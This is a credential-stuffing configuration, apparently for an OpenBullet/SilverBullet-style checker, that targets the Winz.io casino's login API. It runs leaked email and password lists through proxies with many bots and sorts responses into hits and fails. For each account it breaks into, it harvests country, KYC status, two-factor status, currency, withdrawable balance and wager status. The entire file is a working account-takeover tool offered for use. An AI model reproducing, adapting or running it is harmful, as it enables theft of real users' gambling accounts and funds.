[SETTINGS]
{
  "Name": "Winz.io",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-08-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "Email",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "WINZ",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#api/users/sign_in REQUEST POST "https://www.winz.io/api/users/sign_in" ReadResponseSource=FALSE 
  CONTENT "{\"user\":{\"email\":\"<USER>\",\"password\":\"<PASS>\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.softswiss.v1+json, application/vnd.softswiss.v2+json" 

#200_OK? KEYCHECK 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" EqualTo "403" 
    KEY "<RESPONSECODE>" EqualTo "429" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "422" 
  KEYCHAIN Success OR 
    KEY "<COOKIES(_casino_session)>" Contains "eyJ" 

#/api/player REQUEST GET "https://www.winz.io/api/player" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.softswiss.v1+json, application/vnd.softswiss.v2+json" 

#2FA? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "two_factor_enabled\":true" 

#country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

#sumsub_verified PARSE "<SOURCE>" JSON "sumsub_verified" CreateEmpty=FALSE -> CAP "KYC?" 

#api/player/accounts REQUEST GET "https://www.winz.io/api/player/accounts" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/vnd.softswiss.v1+json, application/vnd.softswiss.v2+json" 

#currency PARSE "<SOURCE>" JSON "currency" Recursive=TRUE CreateEmpty=FALSE -> CAP "Currency" 

#available_to_cashout PARSE "<SOURCE>" JSON "available_to_cashout_cents" Recursive=TRUE CreateEmpty=FALSE -> CAP "Balance" 

#wager_status PARSE "<SOURCE>" JSON "wager_status" Recursive=TRUE CreateEmpty=FALSE -> CAP "Rollover" 

#Balance? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Balance>" DoesNotContain "1" 
    KEY "<Balance>" DoesNotContain "2" 
    KEY "<Balance>" DoesNotContain "3" 
    KEY "<Balance>" DoesNotContain "4" 
    KEY "<Balance>" DoesNotContain "5" 
    KEY "<Balance>" DoesNotContain "6" 
    KEY "<Balance>" DoesNotContain "7" 
    KEY "<Balance>" DoesNotContain "8" 
    KEY "<Balance>" DoesNotContain "9" 

